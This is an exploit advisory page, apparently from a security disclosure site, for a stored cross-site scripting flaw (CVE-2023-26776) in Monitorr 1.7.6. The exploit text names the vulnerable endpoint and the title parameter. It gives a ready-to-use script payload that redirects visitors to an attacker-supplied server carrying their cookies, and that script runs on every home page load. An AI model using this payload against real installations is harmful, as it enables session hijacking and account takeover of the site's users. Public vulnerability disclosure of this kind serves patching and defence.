Monitorr 1.7.6 Cross Site Scripting

2023.04.05
Credit: Achuth V P
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79

# Exploit Title: Monitorr v1.7.6 - Cross Site Scripting # CVE: CVE-2023-26776 # Exploit Author: Achuth V P (retrymp3) # Date: February 09, 2023 # Vendor Homepage: https://github.com/Monitorr/ # Software Link: https://github.com/Monitorr/Monitorr # Tested on: Ubuntu # Version: v1.7.6 # Exploit Description: Cross Site Scripting vulnerability found in Monitorr v.1.7.6 allows a remote attacker to execute arbitrary code via the title parameter of the post_receiver-services.php file. Attacker can create a service configuration at <base-url>/assets/php/post_receiver-services.php with the title of the service being something like; <script>document.location="<your-server>?cookie="document.cookie</script> or just <script>document.cookie</script> The injected script tag is executed everytime the home page is loaded.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top